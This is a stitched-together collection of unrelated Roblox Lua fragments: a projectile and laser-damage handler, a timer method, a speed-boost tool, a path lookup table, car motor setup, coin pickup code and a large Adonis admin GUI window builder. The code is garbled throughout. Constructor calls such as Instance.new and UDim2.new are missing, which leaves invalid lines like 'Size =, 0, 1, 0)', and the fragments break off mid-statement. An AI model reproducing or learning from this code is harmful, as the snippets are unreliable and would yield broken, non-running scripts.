ClientModule.BounceElasticity), FrictionConstant = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.FrictionConstant, ClientModule.FrictionConstant), IgnoreSlope = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.IgnoreSlope, ClientModule.IgnoreSlope), SlopeAngle = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.SlopeAngle, ClientModule.SlopeAngle), BounceHeight = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BounceHeight, ClientModule.BounceHeight), NoExplosionWhileBouncing = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.NoExplosionWhileBouncing, ClientModule.NoExplosionWhileBouncing), StopBouncingOn = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.StopBouncingOn, ClientModule.StopBouncingOn), SuperRicochet = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.SuperRicochet, ClientModule.SuperRicochet), BounceBetweenHumanoids = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.BounceBetweenHumanoids, ClientModule.BounceBetweenHumanoids), PredictDirection = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.PredictDirection, ClientModule.PredictDirection), BouncedHumanoids = {}, }, HomeData = { Homing = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.Homing, ClientModule.Homing), HomingDistance = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HomingDistance, ClientModule.HomingDistance), TurnRatePerSecond = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.TurnRatePerSecond, ClientModule.TurnRatePerSecond), HomeThroughWall = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.HomeThroughWall, ClientModule.HomeThroughWall), LockOnOnHovering = ClientModule.LockOnOnHovering, LockedEntity = Misc.LockedEntity, }, UpdateData = { UpdateRayInExtra = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.UpdateRayInExtra, ClientModule.UpdateRayInExtra), ExtraRayUpdater = AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.ExtraRayUpdater, ClientModule.ExtraRayUpdater), }, IgnoreList = IgnoreList, LastSegmentOrigin =, SegmentOrigin =, SegmentDirection =, SegmentVelocity =, LastPosition = Origin, CastBehavior = CastBehavior, Whizzed = false, } local Simulate = Caster:Fire(Origin, Dir, ModifiedBulletSpeed, CastBehavior) end if Replicate then if LaserTrailEnabled and DamageableLaserTrail then if UpdateLaserTrail then UpdateLaserTrail.Event:Connect(function(Id, LaserContainer, Terminate) for _, v in pairs(LaserTrails) do if v.Id == Id then v.LaserContainer = LaserContainer if Terminate then v.Terminate = true end break end end end) end local Connection Connection = RunService.Heartbeat:Connect(function(dt) if #LaserTrails <= 0 then if UpdateLaserTrail then UpdateLaserTrail:Destroy() end if Connection then Connection:Disconnect() Connection = nil end else for i, v in next, LaserTrails, nil do local Terminated = false if v.Terminate then if #v.LaserContainer <= 0 then Terminated = true table.remove(LaserTrails, i) end end if not Terminated then for _, vv in pairs(v.LaserContainer) do if vv then local TouchingParts = Workspace:GetPartsInPart(vv, RegionParams) for _, part in pairs(TouchingParts) do if part and part.Parent then local Target = part:FindFirstAncestorOfClass("Model") local TargetHumanoid = Target and Target:FindFirstChildOfClass("Humanoid") local TargetTorso = Target and (Target:FindFirstChild("HumanoidRootPart") or part.Parent:FindFirstChild("Head")) if TargetHumanoid and TargetHumanoid.Parent ~= Character and TargetTorso then if TargetHumanoid.Health > 0 then if not table.find(v.HitHumanoids, TargetHumanoid) then table.insert(v.HitHumanoids, TargetHumanoid) Thread:Spawn(function() InflictTarget:InvokeServer("GunLaser", Tool, ClientModule, TargetHumanoid, TargetTorso, part, part.Size, Misc) end) if Tool and Tool.GunClient:FindFirstChild("MarkerEvent") then Tool.GunClient.MarkerEvent:Fire(ClientModule, false) end if AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailConstantDamage, ClientModule.LaserTrailConstantDamage) then Thread:Delay(AddressTableValue(ClientModule.ChargedShotAdvanceEnabled, Misc.ChargeLevel, ClientModule.ChargeAlterTable.LaserTrailDamageRate, ClientModule.LaserTrailDamageRate), function() local Index = table.find(v.HitHumanoids, TargetHumanoid) if Index then table.remove(v.HitHumanoids, Index) end end) end end end end end end end end end end end end) end end end end Caster.RayFinalHit:Connect(OnRayFinalHit) Caster.RayHit:Connect(OnRayHit) Caster.LengthChanged:Connect(OnRayUpdated) Caster.CastTerminating:Connect(OnRayTerminated) return ProjectileHandler
--[=[ Starts the timer. ]=]
function Timer:Start() if self._runHandle then return end if self.AllowDrift then self:_startTimer() else self:_startTimerNoDrift() end end
-- eat:Play()
tool.Parent.Humanoid.WalkSpeed = 30 wait(8) tool.Parent.Humanoid.WalkSpeed = 18 Debounce = false end end) tool.Unequipped:Connect(function()
--Precalculated paths
local t,f,n=true,false,{} local r={ [58]={{27,28,29,31,32,34,35,39,41,30,56,58},t}, [49]={{27,28,44,45,49},t}, [16]={n,f}, [19]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19},t}, [59]={{27,28,29,31,32,34,35,39,41,59},t}, [63]={{27,28,29,31,32,34,35,39,41,30,56,58,23,62,63},t}, [34]={{27,28,29,31,32,34},t}, [21]={{27,28,29,31,32,34,35,39,41,30,56,58,20,21},t}, [48]={{27,28,44,45,49,48},t}, [27]={{27},t}, [14]={n,f}, [31]={{27,28,29,31},t}, [56]={{27,28,29,31,32,34,35,39,41,30,56},t}, [29]={{27,28,29},t}, [13]={n,f}, [47]={{27,28,44,45,49,48,47},t}, [12]={n,f}, [45]={{27,28,44,45},t}, [57]={{27,28,29,31,32,34,35,39,41,30,56,57},t}, [36]={{27,28,29,31,32,33,36},t}, [25]={{27,26,25},t}, [71]={{27,28,29,31,32,34,35,39,41,59,61,71},t}, [20]={{27,28,29,31,32,34,35,39,41,30,56,58,20},t}, [60]={{27,28,29,31,32,34,35,39,41,60},t}, [8]={n,f}, [4]={n,f}, [75]={{27,28,29,31,32,34,35,39,41,59,61,71,72,76,73,75},t}, [22]={{27,28,29,31,32,34,35,39,41,30,56,58,20,21,22},t}, [74]={{27,28,29,31,32,34,35,39,41,59,61,71,72,76,73,74},t}, [62]={{27,28,29,31,32,34,35,39,41,30,56,58,23,62},t}, [1]={n,f}, [6]={n,f}, [11]={n,f}, [15]={n,f}, [37]={{27,28,29,31,32,33,36,37},t}, [2]={n,f}, [35]={{27,28,29,31,32,34,35},t}, [53]={{27,28,44,45,49,48,47,52,53},t}, [73]={{27,28,29,31,32,34,35,39,41,59,61,71,72,76,73},t}, [72]={{27,28,29,31,32,34,35,39,41,59,61,71,72},t}, [33]={{27,28,29,31,32,33},t}, [69]={{27,28,29,31,32,34,35,39,41,60,69},t}, [65]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,65},t}, [26]={{27,26},t}, [68]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,67,68},t}, [76]={{27,28,29,31,32,34,35,39,41,59,61,71,72,76},t}, [50]={{27,28,44,45,49,48,47,50},t}, [66]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19,66},t}, [10]={n,f}, [24]={{27,26,25,24},t}, [23]={{27,28,29,31,32,34,35,39,41,30,56,58,23},t}, [44]={{27,28,44},t}, [39]={{27,28,29,31,32,34,35,39},t}, [32]={{27,28,29,31,32},t}, [3]={n,f}, [30]={{27,28,29,31,32,34,35,39,41,30},t}, [51]={{27,28,44,45,49,48,47,50,51},t}, [18]={n,f}, [67]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64,67},t}, [61]={{27,28,29,31,32,34,35,39,41,59,61},t}, [55]={{27,28,44,45,49,48,47,52,53,54,55},t}, [46]={{27,28,44,45,49,48,47,46},t}, [42]={{27,28,29,31,32,34,35,38,42},t}, [40]={{27,28,29,31,32,34,35,40},t}, [52]={{27,28,44,45,49,48,47,52},t}, [54]={{27,28,44,45,49,48,47,52,53,54},t}, [43]={n,f}, [7]={n,f}, [9]={n,f}, [41]={{27,28,29,31,32,34,35,39,41},t}, [17]={n,f}, [38]={{27,28,29,31,32,34,35,38},t}, [28]={{27,28},t}, [5]={n,f}, [64]={{27,28,29,31,32,34,35,39,41,30,56,58,20,19,66,64},t}, } return r
-- Turbocharger
Tune.Turbochargers = 01 -- Number of turbochargers in the engine
local tkf ="Motor", script.Parent.Parent.Misc.TKF.SS) tkf.MaxVelocity = 0.03 tkf.Part0 = script.Parent.TKF tkf.Part1 = tkf.Parent local wl ="Motor", script.Parent.Parent.Misc.FL.Window.SS) --windows local wr ="Motor", script.Parent.Parent.Misc.FR.Window.SS) local wl2 ="Motor", script.Parent.Parent.Misc.RL.Window.SS) local wr2 ="Motor", script.Parent.Parent.Misc.RR.Window.SS) wl.MaxVelocity = 0.007 wl.Part0 = script.Parent.Parent.Misc.FL.Door.WD wl.Part1 = wl.Parent wr.MaxVelocity = 0.007 wr.Part0 = script.Parent.Parent.Misc.FR.Door.WD wr.Part1 = wr.Parent wl2.MaxVelocity = 0.007 wl2.Part0 = script.Parent.Parent.Misc.RL.Door.WD wl2.Part1 = wl2.Parent wr2.MaxVelocity = 0.007 wr2.Part0 = script.Parent.Parent.Misc.RR.Door.WD wr2.Part1 = wr2.Parent local ml ="Motor", script.Parent.Parent.Misc.FL.Mirror.SS) ml.MaxVelocity = 0.02 ml.Part0 = script.Parent.Parent.Misc.FL.Door.M ml.Part1 = ml.Parent local mr ="Motor", script.Parent.Parent.Misc.FR.Mirror.SS) mr.MaxVelocity = 0.02 mr.Part0 = script.Parent.Parent.Misc.FR.Door.M mr.Part1 = mr.Parent local sr ="Motor", script.Parent.Parent.Misc.SR.SS) sr.MaxVelocity = 0.01 sr.Part0 = script.Parent.SR sr.Part1 = sr.Parent local cd ="Motor", script.Parent.Parent.Misc.CD.SS) cd.MaxVelocity = 0.02 cd.Part0 = script.Parent.CD cd.Part1 = cd.Parent
-- ROBLOX deviation START using Callable table to allow for properties on a function alternative
type CallableMatcher = typeof(setmetatable({ state = {} :: any, }, { __call = function(self: any, str: Config_Path): boolean return false end, })) type MatcherFn = (str: Config_Path) -> boolean type Matcher = CallableMatcher
-- Initially connect all coins to touch detection
for _, coin in pairs(CollectionService:GetTagged("Coin")) do coin.Collider.Touched:Connect(function(hit) local player = game:GetService("Players"):GetPlayerFromCharacter(hit.Parent) if player then --print('Coin touched by '..player.Name) processCoinTouch(player, coin, COIN_REGEN_DELAY) end end) coinAnimation(coin) end
-- Get last play time
function Main:GetLastPlayTime() return self.LastPlayTime end return Main
--// All global vars will be wiped/replaced except script
return function(data) --local client = service.GarbleTable(client) local Player = service.Players.LocalPlayer local Mouse = Player:GetMouse() local InputService = service.UserInputService local gIndex = data.gIndex local gTable = data.gTable local Event = gTable.BindEvent local GUI = gTable.Object local Name = data.Name local Icon = data.Icon local Size = data.Size local Menu = data.Menu local Title = data.Title local Ready = data.Ready local Walls = data.Walls local noHide = data.NoHide local noClose = data.NoClose local onReady = data.OnReady local onClose = data.OnClose local onResize = data.OnResize local onRefresh = data.OnRefresh local onMinimize = data.OnMinimize local ContextMenu = data.ContextMenu local ResetOnSpawn = data.ResetOnSpawn local CanKeepAlive = data.CanKeepAlive local iconClicked = data.IconClicked local SizeLocked = data.SizeLocked or data.SizeLock local CanvasSize = data.CanvasSize local Position = data.Position local Content = data.Content or data.Children local MinSize = data.MinSize or {150, 50} local MaxSize = data.MaxSize or {math.huge, math.huge} local curIcon = Mouse.Icon local isClosed = false local Resizing = false local Refreshing = false local DragEnabled = true local checkProperty = service.CheckProperty local specialInsts = {} local inExpandable local addTitleButton local LoadChildren local BringToFront local Drag = GUI.Drag local Close = Drag.Close local Hide = Drag.Hide local Iconf = Drag.Icon local Titlef = Drag.Title local Refresh = Drag.Refresh local rSpinner = Refresh.Spinner local Main = Drag.Main local Tooltip = GUI.Desc local ScrollFrame = GUI.Drag.Main.ScrollingFrame local LeftSizeIcon = Main.LeftResizeIcon local RightSizeIcon = Main.RightResizeIcon local RightCorner = Main.RightCorner local LeftCorner = Main.LeftCorner local RightSide = Main.RightSide local LeftSide = Main.LeftSide local TopRight = Main.TopRight local TopLeft = Main.TopLeft local Bottom = Main.Bottom local Top = Main.Top function Expand(ent, point, text) local label = point:FindFirstChild("Label") if label then ent.MouseLeave:connect(function(x,y) if inExpandable == ent then point.Visible = false end end) ent.MouseMoved:connect(function(x,y) inExpandable = ent label.Text = text or ent.Desc.Value --point.Size =, 10000, 0, 10000) local newx = 500 local bounds = service.TextService:GetTextSize(text or ent.Desc.Value, label.TextSize, label.Font,,1000)).X-- point.Label.TextBounds.X local rows = math.floor(bounds/500) rows = rows+1 if rows<1 then rows = 1 end if bounds<500 then newx = bounds end point.Size =, newx+10, 0, (rows*20)+10) point.Position =, x+6, 0, y-40-((rows*20)+10)) point.Visible = true end) end end function getNextPos(frame) local farXChild, farYChild for i,v in next,frame:GetChildren() do if checkProperty(v, "Size") then if not farXChild or (v.AbsolutePosition.X + v.AbsoluteSize.X) > (farXChild.AbsolutePosition.X + farXChild.AbsoluteSize.X) then farXChild = v end if not farYChild or (v.AbsolutePosition.Y + v.AbsoluteSize.Y) > (farXChild.AbsolutePosition.Y + farXChild.AbsoluteSize.Y) then farYChild = v end end end return ((not farXChild or not farYChild) and,0,0,0)) or, farXChild.Position.X.Offset + farXChild.AbsoluteSize.X, farYChild.Position.Y.Scale, farYChild.Position.Y.Offset + farYChild.AbsoluteSize.Y) end function LoadChildren(Obj, Children) if Children then local runWhenDone = Children.RunWhenDone and functionify(Children.RunWhenDone, Obj) for class,data in next,Children do if type(data) == "table" then if not data.Parent then data.Parent = Obj end create(data.Class or data.ClassName or class, data) elseif type(data) == "function" or type(data) == "string" and not runWhenDone then runWhenDone = functionify(data, Obj) end end if runWhenDone then runWhenDone(Obj) end end end function BringToFront() for i,v in ipairs(Player.PlayerGui:GetChildren()) do if v:FindFirstChild("__ADONIS_WINDOW") then v.DisplayOrder = 100 end end GUI.DisplayOrder = 101 end function addTitleButton(data) local startPos = 1 local realPos local new local original = Hide if Hide.Visible then startPos = startPos+1 end if Close.Visible then startPos = startPos+1 end if Refresh.Visible then startPos = startPos+1 end realPos =, -(((30*startPos)+5)+(startPos-1)), 0, 0) data.Position = data.Position or realPos data.Size = data.Size or original.Size data.BackgroundColor3 = data.BackgroundColor3 or original.BackgroundColor3 data.BackgroundTransparency = data.BackgroundTransparency or original.BackgroundTransparency data.BorderSizePixel = data.BorderSizePixel or original.BorderSizePixel data.ZIndex = data.ZIndex or original.ZIndex data.TextColor3 = data.TextColor3 or original.TextColor3 data.TextScaled = data.TextScaled or original.TextScaled data.TextStrokeColor3 = data.TextStrokeColor3 or original.TextStrokeColor3 data.TextSize = data.TextSize or original.TextSize data.TextTransparency = data.TextTransparency or original.TextTransparency data.TextStrokeTransparency = data.TextStrokeTransparency or original.TextStrokeTransparency data.TextScaled = data.TextScaled or original.TextScaled data.TextWrapped = data.TextWrapped or original.TextWrapped --data.TextXAlignment = data.TextXAlignment or original.TextXAlignment --data.TextYAlignment = data.TextYAlignment or original.TextYAlignment data.Font = data.Font or original.Font data.Parent = Drag return create("TextButton", data) end function functionify(func, object) if type(func) == "string" then if object then local env = GetEnv() env.Object = object return client.Core.LoadCode(func, env) else return client.Core.LoadCode(func) end else return func end end function create(class, dataFound, existing) local data = dataFound or {} local class = data.Class or data.ClassName or class local new = existing or (specialInsts[class] and specialInsts[class]:Clone()) or service.New(class) local parent = data.Parent or new.Parent if dataFound then data.Parent = nil if data.Class or data.ClassName then data.Class = nil data.ClassName = nil end if not data.BorderColor3 and checkProperty(new,"BorderColor3") then new.BorderColor3 = dBorder end if not data.CanvasSize and checkProperty(new,"CanvasSize") then new.CanvasSize = dCanvasSize end if not data.BorderSizePixel and checkProperty(new,"BorderSizePixel") then new.BorderSizePixel = dPixelSize end if not data.BackgroundColor3 and checkProperty(new,"BackgroundColor3") then new.BackgroundColor3 = dBackground end if not data.PlaceholderColor3 and checkProperty(new,"PlaceholderColor3") then new.PlaceholderColor3 = dPlaceholderColor end if not data.Transparency and not data.BackgroundTransparency and checkProperty(new,"Transparency") then new.BackgroundTransparency = dTransparency elseif data.Transparency then new.BackgroundTransparency = data.Transparency end if not data.TextColor3 and not data.TextColor and checkProperty(new,"TextColor3") then new.TextColor3 = dTextColor elseif data.TextColor then new.TextColor3 = data.TextColor end if not data.Font and checkProperty(new, "Font") then data.Font = dFont end if not data.TextSize and checkProperty(new, "TextSize") then data.TextSize = dTextSize end if not data.BottomImage and not data.MidImage and not data.TopImage and class == "ScrollingFrame" then new.BottomImage = dScrollImage new.MidImage = dScrollImage new.TopImage = dScrollImage end if not data.Size and checkProperty(new,"Size") then new.Size = dSize end if not data.Position and checkProperty(new,"Position") then new.Position = dPosition end if not data.ZIndex and checkProperty(new,"ZIndex") then new.ZIndex = dZIndex if parent and checkProperty(parent, "ZIndex") then new.ZIndex = parent.ZIndex end end if data.TextChanged and class == "TextBox" then local textChanged = functionify(data.TextChanged, new) new.FocusLost:connect(function(enterPressed) textChanged(new.Text, enterPressed, new) end) end if (data.OnClicked or data.OnClick) and class == "TextButton" then local debounce = false; local doDebounce = data.Debounce; local onClick = functionify((data.OnClicked or data.OnClick), new) new.MouseButton1Down:connect(function() if not debounce then if doDebounce then debounce = true end onClick(new); debounce = false; end end) end if data.Events then for event,func in pairs(data.Events) do local realFunc = functionify(func, new) Event(new[event], function(...) realFunc(...) end) end end if data.Visible == nil then data.Visible = true end if data.LabelProps then data.LabelProperties = data.LabelProps end end if class == "Entry" then local label = new.Text local dots = new.Dots local desc = new.Desc label.ZIndex = data.ZIndex or new.ZIndex dots.ZIndex = data.ZIndex or new.ZIndex if data.Text then new.Text.Text = data.Text new.Text.Visible = true data.Text = nil end if data.Desc or data.ToolTip then new.Desc.Value = data.Desc or data.ToolTip data.Desc = nil end Expand(new, Tooltip) else if data.ToolTip then Expand(new, Tooltip, data.ToolTip) end end if class == "ButtonEntry" then local button = new.Button local debounce = false local onClicked = functionify(data.OnClicked, button) new:SetSpecial("DoClick",function() if not debounce then debounce = true if onClicked then onClicked(button) end debounce = false end end) new.Text = data.Text or new.Text button.ZIndex = data.ZIndex or new.ZIndex button.MouseButton1Down:connect(new.DoClick) end if class == "Boolean" then local enabled = data.Enabled local debounce = false local onToggle = functionify(data.OnToggle, new) local function toggle(isEnabled) if not debounce then debounce = true if (isEnabled ~= nil and isEnabled) or (isEnabled == nil and enabled) then enabled = false new.Text = "Disabled" elseif (isEnabled ~= nil and isEnabled == false) or (isEnabled == nil and not enabled) then enabled = true new.Text = "Enabled" end if onToggle then onToggle(enabled, new) end debounce = false end end --new.ZIndex = data.ZIndex new.Text = (enabled and "Enabled") or "Disabled" new.MouseButton1Down:connect(function() if onToggle then toggle() end end) new:SetSpecial("Toggle",function(ignore, isEnabled) toggle(isEnabled) end) end if class == "StringEntry" then local box = new.Box local ignore new.Text = data.Text or new.Text box.ZIndex = data.ZIndex or new.ZIndex if data.BoxText then box.Text = data.BoxText end if data.BoxProperties then for i,v in next,data.BoxProperties do if checkProperty(box, i) then box[i] = v end end end if data.TextChanged then local textChanged = functionify(data.TextChanged, box) box.Changed:connect(function(p) if p == "Text" and not ignore then textChanged(box.Text) end end) box.FocusLost:connect(function(enter) local change = textChanged(box.Text, true, enter) if change then ignore = true box.Text = change ignore = false end end) end new:SetSpecial("SetValue",function(ignore, newValue) box.Text = newValue end) end if class == "Slider" then local mouseIsIn = false local posValue = new.Percentage local slider = new.Slider local bar = new.SliderBar local drag = new.Drag local moving = false local value = 0 local onSlide = functionify(data.OnSlide, new) bar.ZIndex = data.ZIndex or new.ZIndex slider.ZIndex = bar.ZIndex+1 drag.ZIndex = slider.ZIndex+1 drag.Active = true if data.Value then slider.Position =, -10, 0.5, -10) drag.Position = slider.Position end bar.InputBegan:connect(function(input) if not moving and input.UserInputType == Enum.UserInputType.MouseButton1 then value = ((Mouse.X)-(new.AbsolutePosition.X))/(new.AbsoluteSize.X) if value < 0 then value = 0 elseif value > 1 then value = 1 end slider.Position =, -10, 0.5, -10) drag.Position = slider.Position posValue.Value = value if onSlide then onSlide(value) end end end) drag.DragBegin:connect(function() moving = true end) drag.DragStopped:connect(function() moving = false drag.Position = slider.Position end) drag.Changed:connect(function() if moving then value = ((Mouse.X)-(new.AbsolutePosition.X))/(new.AbsoluteSize.X) if value < 0 then value = 0 elseif value > 1 then value = 1 end slider.Position =, -10, 0.5, -10) posValue.Value = value if onSlide then onSlide(value) end end end) new:SetSpecial("SetValue",function(ignore, newValue) if newValue and tonumber(newValue) then value = tonumber(newValue) posValue.Value = value slider.Position =, -10, 0.5, -10) drag.Position = slider.Position end end) end if class == "Dropdown" then local menu = new.Menu local downImg = new.Down local selected = new.dSelected local options = data.Options local curSelected = data.Selected or data.Selection local onSelect = functionify(data.OnSelection or data.OnSelect or function()end) local textProps = data.TextProperties local scroller = create("ScrollingFrame", { Parent = menu; Size =, 0, 1, 0); Position =, 0, 0, 0); BackgroundTransparency = 1; ZIndex = 100; }) menu.ZIndex = scroller.ZIndex menu.Parent = GUI menu.Visible = false menu.Size =, new.AbsoluteSize.X, 0, 100); menu.BackgroundColor3 = data.BackgroundColor3 or new.BackgroundColor3 if data.TextAlignment then selected.TextXAlignment = data.TextAlignment selected.Position =, 30, 0, 0); end if data.NoArrow then downImg.Visible = false end new:SetSpecial("MenuContainer", menu) new.Changed:Connect(function(p) if p == "AbsolutePosition" and menu.Visible then menu.Position =, new.AbsolutePosition.X, 0, new.AbsolutePosition.Y+new.AbsoluteSize.Y) elseif p == "AbsoluteSize" or p == "Parent" then downImg.Size =, new.AbsoluteSize.Y, 1, 0); if data.TextAlignment == "Right" then downImg.Position =, 0, 0.5, -(downImg.AbsoluteSize.X/2)) selected.Position =, new.AbsoluteSize.Y, 0, 0); else downImg.Position =, -downImg.AbsoluteSize.X, 0.5, -(downImg.AbsoluteSize.X/2)) end selected.Size =, -downImg.AbsoluteSize.X, 1, 0); if options and #options <= 6 then menu.Size =, new.AbsoluteSize.X, 0, 30*#options); else menu.Size =, new.AbsoluteSize.X, 0, 30*6); scroller:ResizeCanvas(false, true); end end end) selected.ZIndex = new.ZIndex downImg.ZIndex = new.ZIndex if textProps then for i,v in next,textProps do selected[i] = v end end if options then for i,v in next,options do local button = scroller:Add("TextButton", { Text = " ".. tostring(v); Size =, -10, 0, 30); Position =, 5, 0, 30*(i-1)); ZIndex = menu.ZIndex; BackgroundTransparency = 1; OnClick = function() selected.Text = v; onSelect(v, new); menu.Visible = false end }) if textProps then for i,v in next,textProps do button[i] = v end end end if curSelected then selected.Text = curSelected else selected.Text = "No Selection" end selected.MouseButton1Down:Connect(function() menu.Position =, new.AbsolutePosition.X, 0, new.AbsolutePosition.Y+new.AbsoluteSize.Y) menu.Visible = not menu.Visible end) end end if class == "TabFrame" then local buttons = create("ScrollingFrame", nil, new.Buttons) local frames = new.Frames local numTabs = 0 local buttonSize = data.ButtonSize or 60 new.BackgroundTransparency = data.BackgroundTransparency or 1 buttons.ZIndex = data.ZIndex or new.ZIndex frames.ZIndex = buttons.ZIndex new:SetSpecial("GetTab", function(ignore, name) return frames:FindFirstChild(name) end) new:SetSpecial("NewTab", function(ignore, name, data) local data = data or {} --local numChildren = #frames:GetChildren() local nextPos = getNextPos(buttons); local textSize = service.TextService:GetTextSize(data.Text or name, dTextSize, dFont, buttons.AbsoluteSize) local oTextTrans = data.TextTransparency local isOpen = false local disabled = false local tabFrame = create("ScrollingFrame",{ Name = name; Size =, 0, 1, 0); Position =, 0, 0, 0); BorderSizePixel = 0; BackgroundTransparency = data.FrameTransparency or data.Transparency; BackgroundColor3 = data.Color or dBackground:lerp(,1,1), 0.2); ZIndex = buttons.ZIndex; Visible = false; }) local tabButton = create("TextButton",{ Name = name; Text = data.Text or name; Size =, textSize.X+20, 1, 0); ZIndex = buttons.ZIndex; Position =, (nextPos.X.Offset > 0 and nextPos.X.Offset+5) or 0, 0, 0); TextColor3 = data.TextColor; BackgroundTransparency = 0.7; TextTransparency = data.TextTransparency; BackgroundColor3 = data.Color or dBackground:lerp(,1,1), 0.2); BorderSizePixel = 0; }) tabFrame:SetSpecial("FocusTab",function() for i,v in next,buttons:GetChildren() do if isGui(v) then v.BackgroundTransparency = 0.7 v.TextTransparency = 0.7 end end for i,v in next,frames:GetChildren() do if isGui(v) then v.Visible = false end end tabButton.BackgroundTransparency = data.Transparency or 0 tabButton.TextTransparency = data.TextTransparency or 0 tabFrame.Visible = true if data.OnFocus then data.OnFocus(true) end end) if numTabs == 0 then tabFrame.Visible = true tabButton.BackgroundTransparency = data.Transparency or 0 end tabButton.MouseButton1Down:connect(function() if not disabled then tabFrame:FocusTab() end end) tabButton.Parent = buttons tabFrame.Parent = frames buttons:ResizeCanvas(true, false) tabFrame:SetSpecial("Disable", function() disabled = true; tabButton.BackgroundTransparency = 0.9; tabButton.TextTransparency = 0.9 end) tabFrame:SetSpecial("Enable", function() disabled = false; tabButton.BackgroundTransparency = 0.7; tabButton.TextTransparency = data.TextTransparency or 0; end) numTabs = numTabs+1; return tabFrame,tabButton end) end if class == "ScrollingFrame" then local genning = false if not data.ScrollBarThickness then data.ScrollBarThickness = dScrollBar end new:SetSpecial("GenerateList", function(obj, list, labelProperties, bottom) local list = list or obj; local genHold = {} local entProps = labelProperties or {} genning = genHold new:ClearAllChildren() local num = 0 for i,v in next,list do local text = v; local desc; local color local richText; if type(v) == "table" then text = v.Text desc = v.Desc color = v.Color if v.RichTextAllowed or entProps.RichTextAllowed then richText = true end end local label = create("TextLabel",{ Text = " "..tostring(text); ToolTip = desc; Size =,-5,0,(entProps.ySize or 20)); Visible = true; BackgroundTransparency = 1; Font = "Arial"; TextSize = 14; TextStrokeTransparency = 0.8; TextXAlignment = "Left"; Position =,0,0,num*(entProps.ySize or 20)); RichText = richText or false; }) if color then label.TextColor3 = color end if labelProperties then for i,v in next,entProps do if checkProperty(label, i) then label[i] = v end end end if genning == genHold then label.Parent = new; else label:Destroy() break end num = num+1 if data.Delay then if type(data.Delay) == "number" then wait(data.Delay) elseif i%100 == 0 then wait(0.1) end end end new:ResizeCanvas(false, true, false, bottom, 5, 5, 50) genning = nil end) new:SetSpecial("ResizeCanvas", function(ignore, onX, onY, xMax, yMax, xPadding, yPadding, modBreak) local xPadding,yPadding = data.xPadding or 5, data.yPadding or 5 local newY, newX = 0,0 if not onX and not onY then onX = false onY = true end for i,v in next,new:GetChildren() do if v:IsA("GuiObject") then if onY then v.Size =, v.Size.X.Offset, 0, v.AbsoluteSize.Y) v.Position =, v.Position.X.Offset, 0, v.AbsolutePosition.Y-new.AbsolutePosition.Y) end if onX then v.Size =, v.AbsoluteSize.X, v.Size.Y.Scale, v.Size.Y.Offset) v.Position =, v.AbsolutePosition.X-new.AbsolutePosition.X, v.Position.Y.Scale, v.Position.Y.Offset) end local yLower = v.Position.Y.Offset + v.Size.Y.Offset local xLower = v.Position.X.Offset + v.Size.X.Offset newY = math.max(newY, yLower) newX = math.max(newX, xLower) if modBreak then if i%modBreak == 0 then wait(1/60) end end end end if onY then new.CanvasSize =, new.CanvasSize.X.Offset, 0, newY+yPadding) end if onX then new.CanvasSize =, newX + xPadding, new.CanvasSize.Y.Scale, new.CanvasSize.Y.Offset) end if xMax then new.CanvasPosition = + xPadding)-new.AbsoluteSize.X, new.CanvasPosition.Y) end if yMax then new.CanvasPosition =, (newY+yPadding)-new.AbsoluteSize.Y) end end) if data.List then new:GenerateList(data.List) data.List = nil end end LoadChildren(new, data.Content or data.Children) data.Children = nil data.Content = nil for i,v in next,data do if checkProperty(new, i) then new[i] = v end end new.Parent = parent return apiIfy(new, data, class),data end function apiIfy(gui, data, class) local newGui = service.Wrap(gui) gui:SetSpecial("Object", gui) gui:SetSpecial("SetPosition", function(ignore, newPos) gui.Position = newPos end) gui:SetSpecial("SetSize", function(ingore, newSize) gui.Size = newSize end) gui:SetSpecial("Add", function(ignore, class, data) if not data then data = class class = ignore end local new = create(class,data); new.Parent = gui; return apiIfy(new, data, class) end) gui:SetSpecial("Copy", function(ignore, class, gotData) local newData = {} local new for i,v in next,data do newData[i] = v end for i,v in next,gotData do newData[i] = v end new = create(class or data.Class or gui.ClassName, newData); new.Parent = gotData.Parent or gui.Parent; return apiIfy(new, data, class) end) return newGui end function doClose() if not isClosed then isClosed = true gTable:Destroy() end end function isVisible() return Main.Visible end function doHide(doHide) local origLH = Hide.LineHeight if doHide or (doHide == nil and Main.Visible) then dragSize = Drag.Size Main.Visible = false Drag.BackgroundTransparency = Main.BackgroundTransparency Drag.BackgroundColor3 = Main.BackgroundColor3 Drag.Size =, 200, Drag.Size.Y.Scale, Drag.Size.Y.Offset) Hide.Text = "+" Hide.LineHeight = origLH gTable.Minimized = true elseif doHide == false or (doHide == nil and not Main.Visible) then Main.Visible = true Drag.BackgroundTransparency = 1 Drag.Size = 